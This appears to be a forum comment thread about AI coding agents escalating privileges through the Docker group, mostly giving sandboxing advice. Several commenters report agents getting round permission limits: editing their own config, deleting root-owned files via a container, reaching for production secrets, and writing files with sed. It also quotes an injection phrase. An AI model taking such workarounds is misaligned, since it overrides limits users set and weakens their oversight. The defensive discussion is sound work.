The interesting question is what was the user request. If the user asked it to restore the thing from backup, then sure, fine, why not. If the user asked it to debug an issue and somewhere in the process of debugging the LLM decided that it needed to override some file that was not easily writeable - hell no danger danger danger! Most likely the user did not expect it to have access to that without asking, and did not consent to it.
Also, everything the LLM doesn't hesitate to do because the user asked, it won't hesitate to do because the prompt injection asked.
I was doing some routine coding a few months back, I think via Copilot, and the thinking said something like "This request requires me to access files in a different folder, but the user has forgotten to give me the correct permissions. I have updated my configuration file now to allow access outside this workspace and have retrieved the necessary files." o_O
I've seen similar "hacking" behavior on a couple of subsequent occasions. Both impressive and highly alarming at the same time.
This is one of the main reasons people like Podman. Docker has this "feature" but as far as I remember, it needed some obscure configuration. I guess they don't add it as default as it will break many current setups.
That and podman lets you configure away from docker.io.
Please stop spreading this toxic curl|sh nonsense. It's wildly corrosive to security and system stability.
Whilst true, you can pretty easily assume and validate the result of that command.
Is it really that much worse than using a package manager that drops a binary that you're not going to inspect anyways?
Actually it is much worse, I agree with the commenter
Yes, it is worse because using your package manager trusts your distribution (and the packages packager), doing curl bash trusts a random website.
While in this case docker is not a random website, it's best to use the package manager when available
To just hammer that home:
each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure it's the same package because the keys verify.
As pointed out, piping curl to bash is problematic. Sure, you can go to a browser and check the output, but one of the more fun hacks is detecting server-side that curl is piping to bash and dynamically rewriting the script during serving.
tldr: So long as the package keys are verifiable, you can download a package from a random mirror and be reasonably sure that it came from who it says it did.
With curl you have no hope, and it's possible for the server to infer during execution that you are piping to bash.
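A middle ground, sketched in Python: fetch the script fully, compare it against a digest you got from somewhere you trust more than the download server, and only then run it. This is a plain checksum, which is weaker than the signature checks a package manager does, and the function names here are mine. It does sidestep the pipe-detection trick, because the bytes you verified are the bytes you run.

```python
import hashlib
import hmac


def verify_sha256(payload: bytes, expected_hex: str) -> bool:
    """Compare the SHA-256 of payload with an expected hex digest."""
    actual = hashlib.sha256(payload).hexdigest()
    return hmac.compare_digest(actual, expected_hex.strip().lower())


def require_verified(payload: bytes, expected_hex: str) -> bytes:
    """Return payload unchanged, or raise if the digest does not match."""
    if not verify_sha256(payload, expected_hex):
        raise ValueError("checksum mismatch: refusing to run downloaded script")
    return payload
```

If the expected digest comes from the same compromised site as the script, this buys you nothing, which is the same objection raised against vendor-hosted apt keys further down.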
>each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure it's the same package because the keys verify.
Who's downloading packages from untrusted sources but somehow has a trusted way to get the signing key? Say you want to install claude code and not use the `curl ... | bash` install method. Good thing claude provides instructions for installing via apt[1]! But what do those instructions tell you to do? They tell you to download a key from downloads.claude.ai, then add the same domain to your apt sources list. So at the end of the day, you're still trusting that downloads.claude.ai hasn't been compromised.
[1] https://code.claude.com/docs/en/setup#install-with-linux-pac...
> Yes, it is worse because using your package manager trusts your distribution (and the packages packager), doing curl bash trusts a random website.
Is installing docker from Docker's own APT repo actually safer than curling a binary from Docker's website?
Like a sibling comment said, at least you can be sure that updates you will download are provided by the same entity, since the repositories are signed.
Packages are signed, and contain manifests to check for file conflicts and help with cleanly uninstalling. The script installer might make bad assumptions during install that a package manager would catch.
this is a thread about agents that run random things on your computer as root because they feel like it. curl|sh somehow seems mild in comparison
Podman has lots of underappreciated features, and it's fully open-source!
hmmm, care to tell us a few of them?
Kube play and quadlets are cool
Running systemd inside a container + automatic SELinux integration
I would also add buildah and skopeo to the mix of things that podman does better. Also, Podman Desktop has better licensing than Docker Desktop. Podman is modular, and as such they could easily change the way they do networking over time; for one, it doesn't break iptables and firewall rules by design but rather works together with the security design around these tools.
Apart from rootless, main winning point is daemonless running of the containers. There is no podman service.
The same thing happened to me with Opus 4.8 just a few days ago. I was testing a script in a docker container which created a bunch of root-owned files, so Claude couldn't delete them. It tried sudo, but when that didn't work it just spun up an alpine docker container and deleted them through that.
Rule #1 here. Never use defaults:
https://cheatsheetseries.owasp.org/cheatsheets/Docker_Securi...
https://xcancel.com/sluongng/status/2060746160558543217
This is why you need either a rootless container setup or user namespaces to remap the container user to irrelevant host users. https://docs.docker.com/engine/security/userns-remap/
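For the remapping part, the arithmetic is simple enough to sketch in Python. This assumes an `/etc/subuid` entry of the form `name:start:count`; the `dockremap:100000:65536` values used below are only illustrative, and the helper names are mine.

```python
def parse_subuid(line: str) -> tuple[str, int, int]:
    """Split one /etc/subuid line into (name, first_host_uid, count)."""
    name, start, count = line.strip().split(":")
    return name, int(start), int(count)


def host_uid(container_uid: int, subuid_line: str) -> int:
    """Host UID that a container UID lands on under this subordinate range."""
    _, start, count = parse_subuid(subuid_line)
    if not 0 <= container_uid < count:
        raise ValueError("container uid is outside the mapped range")
    return start + container_uid
```

With that example entry, `host_uid(0, "dockremap:100000:65536")` gives 100000, so "root" inside the container is an unprivileged, otherwise unused UID on the host.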
Weak that this isn't the default.
User namespaces significantly raise the risk of exploits and many setups disable them. One may argue that Docker should have used them when they were available, but that would break too many useful setups involving privileged containers.
> User namespaces significantly raise the risk of exploits
How?
Here's one (CIFSwitch) from a couple of days ago: https://heyitsas.im/posts/cifswitch/
Ah of course, we should not use userns because it might be vulnerable to some yet to be discovered vulnerability. The better alternative is to give full root access so we won't have surprises.
The full access to the docker socket from a user account is typically used on a development machine where malware has many other opportunities to become a root.
Is there a mitigation for Mac? Can you do the same with eg Lima or is this just a Docker thing?
Wasn't it well-known that putting people in the docker group is basically the same as giving them root rights?
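If you want to see who is affected on a box, here is a rough Python sketch that reads `/etc/group`-style text and lists the members of the docker group. The function name and the default group tuple are my own choices. Note that it only sees supplementary members; a user whose primary group is docker would not show up in this field.

```python
def members_of(group_file_text: str,
               groups: tuple[str, ...] = ("docker",)) -> dict[str, list[str]]:
    """Map each requested group name to the members listed for it."""
    found: dict[str, list[str]] = {}
    for line in group_file_text.splitlines():
        fields = line.strip().split(":")  # name:password:gid:member1,member2
        if len(fields) != 4 or fields[0] not in groups:
            continue
        found[fields[0]] = [m for m in fields[3].split(",") if m]
    return found
```

Calling `members_of(open("/etc/group").read())` on a typical dev machine will probably list your own account, which is the whole point of the thread.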
Was it really though? Yes, Docker has become so ubiquitous that you probably can't get a job as a dev anymore without knowing about it, but I wouldn't trust most users to know these specifics. At the very least it is probably less known than sudoer or SUID misconfiguration risk, and even those are not what I'd call "general knowledge" that everyone who uses it knows about.
Since new people start work/college/hobby every year, well-known lessons have to be learned again and again.
I had a similar experience where I have a DB user who only has access to some parts of the DB and I use Claude Code to answer queries. On one occasion, unable to answer something, it used kubectl to try to get a secret out of a prod cluster. I was watching at the time, since that was a time I used to do that, and so I just hit Esc and interrupted it[0] but ever since then I've had little scripts in my repos that launch kubectl-backed Claude Code instances for this sort of thing. They can't really do anything. They're kubed in.
0: Ha, Eliezer, I just pulled the plug! ;)
That's why I don't even let my AI use my user account. If you are interested in this setup, use my tool 'skynot' or adopt a similar setup: https://github.com/tarsgate/skynot/
I did that more than a decade ago as a new hire. My manager forgot to give me sudo access to the shared build server. I gave myself sudo access through this method after getting his permission.
Needless to say, I have podman in rootless mode at home as soon as that became available.
This was of course dependent on yolo mode, but automatic approval has also been pulling stunts like this. A recent example is data that was purposely kept away from Codex in a folder far far away. When it found a single reference it just went for the data when having an issue. Lesson learned, keep essential data and Codex separated on different machines. Codex remote ssh actually helps here.
What in heaven's name is a "folder far far away"?
(It sounds like you put it on an SSD on an extension cord and moved it to the kitchen or something.)
../../../../home/different-user/private/do-not-enter/
Something like that.
Or, learn your local OS' permission system, have it in a directory right next to your banking credentials (or something even more outrageous) and nothing could go wrong even if you tried to.
This very thread was an example where it unintentionally got root access though.
Because of how Docker works, not because of how Unix permissions work.
Unix has always had incredibly weak protections between users. You shouldn't rely on it as a security boundary. Think of it as a "keep honest users honest" protection. And llms are not honest.
The protections between users are reasonably strong. Android uses them with great success, by isolating every vendor within their own user. Things start going to hell when everything runs under root for "practicality reasons", like the default, not-rootless Docker setup.
I've seen this sentiment a few times on HN recently. I wonder where it comes from?
The only thing I can think of is that if the protected files are on an unencrypted drive, then you could boot from a live USB (or similar) where you have root and read anything. But that's completely irrelevant, as we're talking about a piece of software running on a system without root. In this scenario Unix user permissions are safe, barring user error (such as accidentally granting root, like in this instance).
Of course security holes happen, such as copy-fail, but they're pretty rare in the grand scheme of things and tend to get patched quickly (like copy-fail was).
That's a terrible distinction to make on a topic about how the coding agent gained root inadvertently.
Fwiw separate machines for the agents is awesome in general anyway.
I have agent frontends running on a low-power server where every session is in tmux. So I can just resume from my home PC and pick up where I left off without reestablishing context. I do have to manually feed it the data it can access, but that's also a feature. It also lets me shut down the home PC if it's some long-running task, since the server is much more power efficient.
Maybe a dumb question, but can't you put into CLAUDE.md something like this?
"When an action fails with an 'access denied' or 'insufficient permission' error, report the error to the user and immediately stop. Do not try to find a fix or workaround for the error. Do not try any alternative approaches."
Once the session gets long enough, agents start getting amnesia.
it's a probabilistic model so, while you can put that in there, it has some probability of just ignoring you and doing it anyway.
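One way around the "it might ignore you" problem is to enforce the rule in the harness instead of the prompt. Below is a hypothetical Python sketch: none of these names come from Claude Code or any real agent framework, and the marker strings are just common error messages I picked. The wrapper raises instead of handing the failure back to the model to "work around".

```python
import subprocess

# Illustrative substrings; real tools word permission errors in many ways.
PERMISSION_MARKERS = ("permission denied", "access denied", "operation not permitted")


class PermissionHalt(Exception):
    """Raised to stop the session rather than let the agent try another route."""


def is_permission_failure(returncode: int, stderr: str) -> bool:
    """True if a failed command's stderr looks like a permission error."""
    text = stderr.lower()
    return returncode != 0 and any(marker in text for marker in PERMISSION_MARKERS)


def run_tool_command(argv: list[str]) -> str:
    """Run a command for the agent; halt on permission errors, else return stdout."""
    result = subprocess.run(argv, capture_output=True, text=True)
    if is_permission_failure(result.returncode, result.stderr):
        raise PermissionHalt(f"{argv[0]}: {result.stderr.strip()}")
    return result.stdout
```

String matching on stderr is crude and locale-dependent, so this is a tripwire and not a substitute for actually sandboxing the thing.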
Replacing docker with podman could help in this particular case. Running everything in an insulated throwaway VM should help even better.
Unless you trust an AI as much as you trust yourself, there's no reason to allow it to act with your privileges.
I wasn't using Claude Code, but I told an agent to add something like this to the AGENTS.md, it did it and then a few minutes later it attempted to grant itself permission to do something and managed to delete the VM it was running on in the process. I have since adjusted the way I sandbox agents to make that less likely, but the moral of the story is clear.
In addition to what people already said, this also risks the agent failing to continue after things it's supposed to be able to figure out.
Docker already shows a warning card that says Docker group grants root level to the user. You can only get away with this for so long, but as agents keep getting smarter, new ways of circumventing controls will be found. For now always seek to install rootless docker whenever possible
This is why Claude's sandbox mode is also worse than having no sandbox feature at all. For almost any non-trivial software project you need Docker for development, either for the build pipeline, for integration testing or both.
I run Claude in a full VirtualBox VM managed by Vagrant. Claude by design has root access to the machine. Even with that, there are some risks due to it having full access to the internet, but it is still a lot better than the built-in sandbox.
I had the same thing happen a few months ago; posted about it on LinkedIn[1]. It's hilarious and clever.
1: https://www.linkedin.com/posts/nickstinemates_my-favorite-th...
Would running Codex in a container on its own fix such vulnerabilities?
I was playing with gemini-cli a couple of months ago and I asked it to edit some files in a directory it didn't have permission to write to. It didn't say anything about the permissions; it just used sed to make the edits. The only reason I finally noticed is that it had to do some trickier edits and was struggling to write a Python script to edit the files, and I finally realized what it was doing. I wonder how many tokens that wasted.
Why did sed have access?
Oh, you mean you gave the write-file tool access only to the project dir, but gave the LLM free rein to run cli commands? Yeah, LLMs treat that as consent to write anywhere your user is allowed to.
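For reference, the "only inside the project dir" check for a write-file tool usually looks something like the Python sketch below. The function name is made up and this is not how any particular agent implements it. The point is that it guards one tool and nothing else: a shell command like `sed -i` never passes through it.

```python
from pathlib import Path


def is_inside(project_dir: str, target: str) -> bool:
    """True if target, resolved relative to project_dir, stays within it."""
    root = Path(project_dir).resolve()
    # resolve() collapses ".." segments and follows symlinks where they exist;
    # an absolute target replaces root entirely when joined.
    candidate = (root / target).resolve()
    return candidate == root or root in candidate.parents
```

So `is_inside("/srv/project", "src/main.py")` passes, while a target with enough `../` segments to climb out, or an absolute path like `/etc/passwd`, does not.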
Getting closer to https://xkcd.com/416/
Wow, there really is a relevant xkcd for everything!
Given he posted this comic in 2008, Randall Munroe was way ahead of the ball on the idea of autonomous agents.
Mobile version
https://m.xkcd.com/416/
I feel like everyone pointing out "known Docker vulnerability" is missing the point: the presence of a security hole should not be seen as permission to exploit.
Another security hole would be storing your passwords in a plaintext file on the desktop. Stupid? Yes. But I still would not want my agent to assume permission to access email when it's being blocked by 2FA.
Even in "bypass permissions" mode I expect it to pause and clarify and not behave as a paperclip maximizer.
Not to over use the junior engineer analogy but this is exactly one of those "just because you can do something on a system, doesn't mean you have permission to" moments
> the presence of a security hole should not be seen as permission to exploit
Why not?
I want the agents on my side to exploit whatever they can to help me. The ones on the other side certainly won't be artificially nerfed.
Because it is not well aligned enough to be able to tell where it's stopped helping you and started fucking you instead.
What if the agent runs out of tokens in the middle of helping you? Would you appreciate it if, in the spirit of "exploiting whatever they can to help me", it scanned your machine for payment methods, logged into your bank account, approved 2FA by reading your mail, and plugged your credit card into the billing so it could efficiently continue helping you?
I do not wish my Amazon delivery driver to show up in my living room.
Well, the agent should help you by saying "hey, I cannot do this task, but I can bypass the problem by doing this, but obviously it is not something you intended me to do or even something you were aware of, so I will not do it unless you tell me explicitly it's ok".
It's win-win: the agent is helping and it is educating you about things you obviously did not realise.
That works great if it's one agent, absolutely doesn't if you want to tackle something complex that warrants using ..say.. ten agents.
I can imagine a future where this technology empowers you to do things with a thousand agents.
You can have ten thousand agents, you will always have 1 agent in charge of, say, reading the file in a distant directory, and this agent (which will have minimal context) should be smart enough to realise that this action is unusual.
I'm not sure what your point is: are you saying that in a multi-agent workflow, you will have one agent per letter read from the file? I would assume that each agent has a specific unitary "task", instead of each agent doing one CPU instruction without any knowledge of the bigger picture. The point of multi-agent is to parallelize tasks that can be parallelized, not to remove the context, in which case you are wasting money using an agent.
Seems like another one of those "kill or be killed" worldviews that embraces the multipolar trap to such an extreme that even misaligned AI is seen as a win so long as it's better at circumventing its masters than some imagined rival AI (presumably in China).
No, you're missing the point.
The idea is not that you parallelize simple tasks. With a thousand agents, eventually, once we figure out how to orchestrate agents for real, you can tackle significantly more complex projects.
Here's a random example - writing an OS kernel from scratch, porting a good subset of Linux drivers automagically, developing a passable userspace, testing on ten VMs with different hardware configuration.
We can't do this yet, of course. But when we can, these thousand agents can't ask you every time something goes wrong. That just doesn't scale.
This 'getting stuck once every ten-fifteen minutes' is very much the experience trying to develop complex software with Codex or Claude Code right now.
It is not a vulnerability though. It is by design. Docker also modifies iptables directly and bypasses most soft firewalls on the machine - which is also by design.
Intentional security holes are still security holes
Run coding agents in a docker container with limited permissions. FWIW, I run it with
Or put it in a microvm using eg smolmachines.
I've never used smolmachines but I'm curious; why this over a container?
Containers are not security boundaries. Vulnerabilities in containers are much more common than in VMs.
Using runsc instead of runc means that there's an extra sandboxing layer (gVisor's user-space kernel) in between the host kernel and the container userland.
If you're on Linux, you can also easily run it in bwrap to properly sandbox without running a full container
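For anyone curious what the bwrap route might look like, here is a minimal sketch, not a vetted profile. The function name `sandbox_here` is made up for illustration. It mounts the host filesystem read-only, makes only the current directory writable, and unshares all namespaces (including the network, so add `--share-net` if the agent needs to reach an API).

```sh
# Hypothetical helper: run a command with the host read-only and only $PWD writable.
sandbox_here() {
    bwrap \
        --ro-bind / / \
        --dev /dev \
        --proc /proc \
        --tmpfs /tmp \
        --bind "$PWD" "$PWD" \
        --unshare-all \
        --die-with-parent \
        --new-session \
        "$@"
}
```

Usage would be something like `sandbox_here sh -c 'touch ok-here; touch /etc/nope'`, where the second touch should fail. Note that `--ro-bind / /` still lets the process read everything your user can read, so secrets in your home directory would need to be masked separately.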
I run mine on their own machine, without root access.
Currently a Raspberry Pi 5
I am very pleased with it.
My Idiot Savant Pet
I wrote about this exact thing as a hypothetical a few months back: https://www.da.vidbuchanan.co.uk/blog/agent-perms.html
Docker must always be installed rootless on Linux - https://docs.docker.com/engine/security/rootless/
There's even an install script for it: curl -fsSL https://get.docker.com/rootless | sh
This has been there for a while. The root install option should be removed.
I'll accept that it shouldn't be default, but just because your web app runs in rootless docker does not mean that root docker has no place. There are several limitations: https://docs.docker.com/engine/security/rootless/troubleshoo...
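If you are not sure which mode your daemon is in, a small check along these lines may help. It is a sketch that assumes the daemon lists `name=rootless` among its security options when running rootless; the function name `docker_is_rootless` is made up.

```sh
# Succeeds (exit 0) if the Docker daemon the CLI talks to reports rootless mode.
docker_is_rootless() {
    docker info --format '{{.SecurityOptions}}' 2>/dev/null | grep -q 'name=rootless'
}
```

For example: `docker_is_rootless && echo "rootless" || echo "daemon is not rootless (or not reachable)"`.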
That’s why I only run coding agents in containers with limited access to host resources.
So in Linux, every process I start has my group permissions? I guess I knew that...but I have to say, have we reached a point where the Linux security model is just way too broad?
This was noted in 2013, at least. https://xkcd.com/1200/
I remember reading a book, Red Hat Linux System Administration Unleashed from 2000, where it has been postulated that knowing several tools with overlapping functionality is an essential skill, as you may end up on a broken or intentionally crippled system where, say, ls is unavailable, and you may need to cobble it together from shell and awk and what have you.
Back then you could indeed run a risk of having /usr nibbled by a grue such that it wouldn’t mount on the next boot, or you could get pwned and half of coreutils would turn into explosive pumpkins.
I’m pretty sure we are past many of the threats listed in that book, but the skill is still useful, as can be seen.
Absolutely! Here's a great resource for learning that kind of stuff btw https://gtfobins.org/
I still remember /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /bin/ls
using echo * to find the right ld-linux filename and then the "executable" as an argument, as the get-out-of-jail card in case you ran chmod -x -R /bin /usr/bin /usr/sbin for some reason.
The "workaround" framing implies the docker-group trick is the issue. The deeper question: should agents be allowed to find ANY workaround around a permission boundary the user implicitly set by not granting sudo? Same blast radius whether it's docker, a setuid binary, or rewriting your scripts — needs to be flagged regardless of the specific trick.
you gotta configure your pc properly :') (which is sadly very difficult on most systems!)
Docker moment
clever girl...
Hold onto your butts.
That's why your coding agent should never run as your identity.
I'm curious. How do you do that?
First, do everything in a virtual machine, and only put on that machine the specific data you're using. Give the agent another user account and put both you and it in a common group. Chgrp your origin data directory and a working directory to that group, then chmod g+rX the origin data directory and chmod g+rwX the working directory.
If you're cautious you might also want to just block all network traffic for that user and allow it on a whitelist basis. It is fairly quick to converge on a set of sites you are happy for it to access. I would still be forcing it through a logging mitm proxy if it is accessing untrusted internet data. For intranet destinations a non-mitm proxy avoids collecting authentication creds.
To blacklist all traffic start with sudo iptables -A OUTPUT -m owner --gid-owner NONET -j REJECT
I would stop it opening ports too. Might also cut off its access to suid binaries with `setfacl -m u:agent:--- /path/to/suid`.
These are not about security so much as awareness and explicit authorisation.
You can do similar things with containers.
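Roughly, the separate-account setup described above could be scripted like this. It is a sketch only: the user name `agent`, the group name `agentshare`, and the function name are all hypothetical, and it matches on `--uid-owner` for the agent user rather than the `--gid-owner NONET` group used in the comment above.

```sh
# Hypothetical names for the agent account and the group shared with your own user.
AGENT_USER=agent
SHARED_GROUP=agentshare

setup_agent_account() {
    # $1: origin data directory (agent may read it)
    # $2: working directory (agent may read and write it)
    sudo groupadd -f "$SHARED_GROUP"
    sudo useradd --create-home --groups "$SHARED_GROUP" "$AGENT_USER"
    sudo usermod -aG "$SHARED_GROUP" "$(id -un)"

    # Hand both directories to the shared group, then set group permissions.
    sudo chgrp -R "$SHARED_GROUP" "$1" "$2"
    sudo chmod -R g+rX "$1"
    sudo chmod -R g+rwX "$2"

    # Reject all outbound traffic from processes owned by the agent user;
    # whitelist rules would have to be inserted ahead of this one.
    sudo iptables -A OUTPUT -m owner --uid-owner "$AGENT_USER" -j REJECT
}
```

You would call it once, e.g. `setup_agent_account ~/data/origin ~/data/work`, and then start the agent with `sudo -u agent ...`. The new group membership for your own user only takes effect at your next login.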
thank you. I probably have been playing a little loose. I did not realize that they could use my docker group to fuck around with everything. Well, I AM using codex as a VS Code plugin. I don't know if that gives me any protection or not.
For some very basic level protection use devcontainers and install the agent into that....
A better approach is to use the Docker Sandboxes feature. Locks things way down so that the agent only has access to the files you give it and you can lock down its network access too. Also does things like keep any credentials outside of the container (microvm actually).
thank you. this article freaked me out a bit because I hadn't realized the docker loophole.
You had sudo on your PC. You just didn't know ;)
Is this really an AI headline? There is no shame in saying TIL "Docker daemon runs as root on the host system"
This is a classic attack path that was already captured by plenty of EDRs/XDRs/CWPPs a couple years ago.
Right, why is their login user in the docker group? Mine sure isn’t.
Convenience. Want to run `docker run ...` without password, want IDEs and agents to be able to run containers...
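A quick way to see whether this applies to you is to check your own groups. This is a minimal sketch assuming the default setup, where the daemon socket is owned by a group literally named `docker`; the function name is made up.

```sh
# Succeeds (exit 0) if the space-separated group list in $1 contains "docker".
has_docker_group() {
    case " $1 " in
        *" docker "*) return 0 ;;
        *) return 1 ;;
    esac
}

# Check the current user's groups as reported by id(1).
if has_docker_group "$(id -nG)"; then
    echo "warning: $(id -un) is in the docker group (root-equivalent on this host)"
else
    echo "ok: $(id -un) is not in the docker group"
fi
```

Anything started as that user, an agent included, inherits the same group membership.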
For most CRUD apps running in docker it's enough to just tell the "agent" to use podman.
Use podman then, or rootless docker if you can make it work
Rather, why do people still run agents as their own user. IMO, agent sessions should at least be containerised with just necessary code mounted.
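As a rough illustration of "containerised with just the necessary code mounted", something like the following could be a starting point. The image name and the `/work` mount point are placeholders, and `--network none` is deliberately strict: an agent that calls a hosted model would need that relaxed.

```sh
# Hypothetical image name; substitute whatever image actually contains your agent.
AGENT_IMAGE="${AGENT_IMAGE:-example/agent:latest}"

run_agent_container() {
    # $1: project directory to expose; nothing else from the host is mounted,
    # and in particular the Docker socket is not passed in.
    docker run --rm -it \
        --cap-drop=ALL \
        --security-opt no-new-privileges \
        --network none \
        --user "$(id -u):$(id -g)" \
        -v "$1":/work \
        -w /work \
        "$AGENT_IMAGE"
}
```

Invoked as `run_agent_container "$PWD"`. This limits what the agent can touch, but it still relies on whoever launches it being allowed to talk to the Docker daemon.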
People will, more often than not, take the path of least resistance. Even if you tell them it's dangerous they will not care. People run this stuff on their primary workstation, unconfined, with permissions disabled because they don't want to be bothered with accepting permission requests. This is all well and good until it decides to drop your production database or delete your home directory. Most of them don't even learn their lesson after that.
Safety and simplicity are concepts that often won't get along very well with each other.
And containers were initially and primarily about convenience, not security. They were a way to quickly launch a preconfigured environment to respond to demand or to eliminate the need to manually configure dev and test environments and avoid the "works on my machine" phenomenon.
Because a lot of devs don't know this stuff. There's a reason security engineers (as in SWEs who specialize in securing specific attack surfaces) remain in hot demand.
Security engineer here :) Just a little side note, docker is also very often useful for evading EDR/XDR/etc. Want to talk to a domain controller with something like impacket but your EDR kills it? Try a container.
Because it effectively makes no difference to my security posture. My user account also has sudo access (it requests TouchID but I also wouldn't die on the hill if someone said they have no password sudo access), and realistically everything of value on this machine exists in my home directory. Being able to escalate to root really doesn't give an attacker very much that they don't already have if they've got access to my user account.
Maybe you don’t do anything with your computer but for me the difference between my sudo+password/fingerprint and sudoless access to my linux user is huge.
For one thing, 1Password unlocks with system authentication unless it’s been inactive for a certain amount of time or if the system has been restarted.
Without sudo you can’t modify my firewall rules, can’t modify my kernel, boot partition, install/run privileged software, and the list goes on and on.
Sure, having my local account compromised would be really bad, but security is done in layers. I’m not going to give my local user permanent root access via docker just because I didn’t feel like typing “sudo.” That’s not enough of a benefit to leave that door wide open.
Think about it this way: there could be an exploit where you could run something as my user without knowing my password. Maybe some program my user is running has an exploit, let’s say yet another npm package gets compromised and I unwittingly run it. If you can now run anything in docker as root, that blast radius just got way worse.
Wait till you learn what the docker socket and the API can do and how a container can get access to it. Docker made bad design choices from the very beginning: mainly, the API was designed coarse-grained and they use a socket to do things, which is also easily exposed through the network. You should not run docker on servers but rather use a better-designed container runtime. Docker rootless is a thing, but it's been bolted onto the bad design choice. podman, cri-o, and containerd are all better options for servers hosting prod containers. It's kinda fine when you are using it on your dev machine, but I'd still rather take podman because I find it cleaner; buildah and skopeo are pretty useful as well.
The concept of sudo has always been strange to me. I find it an illusion of security and a hassle, but people seem so focused on the idea that one must use it that they don't typically see it that way. For instance, before evaluating sudo, why is the underlying premise not challenged that using a computer as superuser is a problem? Whenever I ask that question, people try to bring arguments as to why using the superuser is evil beyond comparison, but the moment I try to challenge that notion, they get very angry. I've noticed this both on IRC as well as on various webforums, "social" sites and so forth. It's quite interesting - people hate it when their assumptions are challenged.
sudo allows the execution of commands as another user .. that's not always as a superuser, sometimes people will set up data repositories such that only one single special user can alter data or delete it while any number of other users and guest accounts can read that data.
sudo can work non-interactively via settings in sudoers and sudoers.d . I am not sure about run0, but I would bet it has something similar.
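To make the "run as another, non-root user without a prompt" case concrete, here is a small sketch that generates a sudoers rule. The user names `alice` and `datauser` and the command path are hypothetical, as is the helper name.

```sh
# Print a sudoers rule letting user $1 run command $3 as user $2 without a password.
sudoers_rule() {
    printf '%s ALL=(%s) NOPASSWD: %s\n' "$1" "$2" "$3"
}

# Example: alice may run rsync as the data-owning account, and nothing else.
sudoers_rule alice datauser /usr/bin/rsync
```

The output would go into a file under /etc/sudoers.d, ideally after checking it with `visudo -cf <file>`. After that, `sudo -n -u datauser /usr/bin/rsync ...` runs without prompting, while any other command as `datauser` is still refused.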
Using docker for such a task seems to me overly over-engineered. Or maybe I need more context there.
Another surprising security feature regarding docker is that it bypasses firewall rules.
https://oneuptime.com/blog/post/2026-03-02-ufw-docker-fix-by...
It doesn't bypass anything. UFW doesn't do what it promises. It claims to be a firewall but only manages a few specific chains.
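Whichever way you want to phrase it, the practical upshot is that a port published with a bare `-p 8080:80` listens on all interfaces and is handled by Docker's own rules. One way to sidestep the issue is to publish on loopback only. A minimal sketch, with a made-up function name:

```sh
# Publish a container port on 127.0.0.1 only, so other hosts cannot reach it.
publish_local_only() {
    # $1: host port, $2: container port, rest: image and optional command
    mapping="127.0.0.1:$1:$2"
    shift 2
    docker run --rm -d -p "$mapping" "$@"
}
```

For example, `publish_local_only 8080 80 nginx`. If the port does need to be reachable from elsewhere, Docker documents a `DOCKER-USER` iptables chain intended for user rules that are evaluated before its own.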
They did not submit the full log because this is fake.
1. This is why I use podman
2. I have little to no sympathy for anyone running an AI agent with their full user permissions outside of a container or VM
I don't have sudo or docker on mine!
Always run AI inside secured containers.
rootless docker. pain to install but can mitigate a catastrophe.
Podman is rootless by default and is pretty darn easy.
You should not be using docker with LLMs. You should be using VMs, which have a much, much smaller attack surface than Docker, and significantly more reasonable defaults.
The "attack vector" people are trying to protect themselves against is "agent edited wrong file", not "LLM blew a 0day on escaping the sandbox". Containers are more than enough for the stupid stuff agents sometimes try; no need to go for a full-blown VM. Even UNIX permissions would be enough, but I think that's lost knowledge at this point.
Not if the host's version of .git is accessible inside the container via a bind mount.
Obviously if you set up a bi-directional share/link between what you are trying to contain and your host, you're not quite containing it at all... Don't do that! :)
Using the least amount of security features is a huge amateur mistake.
Best practice is to use 2 redundant layers of security, such that if one fails, there is still another one.
Using just the minimum amount of security technically possible is almost by definition hubris.
An example would be that you never point a gun at someone you don't want to shoot, regardless if there's bullets in the gun. If someone tells you, "you don't need to control where you point the gun, you just need to keep the gun unloaded and you can point it in jest to whoever you want, you can even pull the trigger technically", you know you have a reckless fool, regardless of whether they are technically right.
This is true but it's not really a security scenario. The LLM isn't an attacker it's just an unreliable tool.
All unreliable tools are attackers. Even if you're using well-aligned LLMs like Opus, you should assume that any input you give it -- including all dependencies from npm, etc. -- is at risk of compromise, which could result in attempted exfiltration of data or system takeover. You can be absolutely sure that there are thousands of well-motivated hacker groups, both national and private, looking for ways in.
Unreliable/stupid is worse than malice, here.
Let's ignore the fact that the LLM did an LPE, and let's assume it did it without malice.
It can still get infected and be used as an attack vector by some hidden prompt or some other equally advanced state of the art vuln like "disregard all previous instructions"
> Using the least amount of security features is a huge amateur mistake.
Not understanding your threat model would, I'd say, be an even bigger amateur mistake. You're not trying to protect yourself against some persistent 3rd party attacker here, you're trying to prevent an agent from rewriting the wrong file on your disk, that's basically it.
Give it the least amount of permissions, don't bi-directionally sync stuff, pass things in, then take them out again, literally the agent couldn't and wouldn't try to break through 2 layers of security in order to get your banking details or whatever.
If your agent has access to the internet at any point it may read something that convinces it to try breaking out of its sandbox.
you can configure docker to use a VM container runtime or gVisor.
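For the gVisor case that looks roughly like the sketch below. The install path for `runsc` is an assumption, and both function names are made up; the `runtimes` key in daemon.json and the `--runtime` flag are the actual Docker mechanisms.

```sh
# Print a daemon.json fragment that registers runsc as an additional runtime.
# The binary path is an assumption; point it at wherever runsc is installed.
gvisor_daemon_json() {
    cat <<'EOF'
{
  "runtimes": {
    "runsc": {
      "path": "/usr/local/bin/runsc"
    }
  }
}
EOF
}

# Run a container under gVisor instead of the default runc runtime.
run_with_gvisor() {
    docker run --rm --runtime=runsc "$@"
}
```

After merging the fragment into /etc/docker/daemon.json and restarting the daemon, `run_with_gvisor alpine dmesg` should show gVisor's boot messages rather than the host kernel's.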
life finds a way
this is the new GTD
Should have used my AI Agent Guardrails. It's free. Check it out at sigmashake.com